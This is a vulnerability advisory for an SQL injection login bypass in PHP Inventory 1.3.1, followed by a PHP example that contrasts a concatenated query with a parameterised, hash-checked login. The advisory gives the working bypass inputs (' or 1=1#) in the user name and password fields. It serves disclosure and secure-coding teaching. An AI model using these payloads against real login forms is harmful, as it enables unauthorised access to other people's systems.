INFOSERVE-ADV2011-08 - PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability
Advisory: PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability
Advisory ID: INFOSERVE-ADV2011-08
Author: Stefan Schurtz
Contact:
Affected Software: Successfully tested on PHP Inventory 1.3.1
Vendor URL:
Vendor Status: fixed
CVE-ID: CVE-2009-4595, CVE-2009-4596, CVE-2009-4597
======================
Vulnerability Description
======================
PHP Inventory is (still) prone to a SQL-Injection (Auth Bypass) vulnerability
==============
PoC-Exploit
==============
// with 'magic_quotes_gpc = Off'
USER NAME = ' or 1=1#
or
USER NAME = admin
PASSWORD = ' or 1=1#
=====
Solution
=====
Update to the latest version 1.3.2
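How the inputs from the PoC-Exploit section alter a login query built by string concatenation, next to a login check that binds the user name as a parameter. This is an added example, not PHP Inventory's code and not the vendor's 1.3.2 fix; the table, column and function names are assumptions, and an in-memory SQLite database stands in for the application's MySQL database.

```php
<?php
// Added example. Table, column and function names are assumptions, not PHP Inventory's code.
// SQLite in memory stands in for the application's MySQL database so the script runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (user_name TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
$pdo->prepare('INSERT INTO users VALUES (?, ?)')
    ->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

// Vulnerable pattern: form fields become part of the SQL text.
// The string is only built and printed here, never executed.
function concatenated_query(string $user, string $pass): string
{
    return "SELECT * FROM users WHERE user_name='$user' AND password='$pass'";
}

// Hardened pattern: the user name is a bound value and the password is
// compared against a stored hash, so quotes in either field stay data.
function login(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE user_name = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();   // false when no row matches
    return is_string($hash) && password_verify($pass, $hash);
}

// The two inputs from the advisory (empty password in the first case is
// constructed), followed by one legitimate login with a constructed password.
$cases = [
    ["' or 1=1#", ''],
    ['admin', "' or 1=1#"],
    ['admin', 'constructed-sample-password'],
];
foreach ($cases as [$user, $pass]) {
    echo concatenated_query($user, $pass), "\n";
    echo '  bound-parameter login: ', login($pdo, $user, $pass) ? 'accepted' : 'rejected', "\n";
}
```

In the printed concatenated queries the quote from the form field closes the string literal and MySQL treats everything after `#` as a comment; the bound-parameter check rejects both advisory inputs whether or not magic_quotes_gpc is enabled.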
================
Disclosure Timeline
================
29-Nov-2011 – informed vendor (contact form)
30-Nov-2011 – vendor fix
====
Credits
====
Vulnerability found and advisory written by the INFOSERVE security team.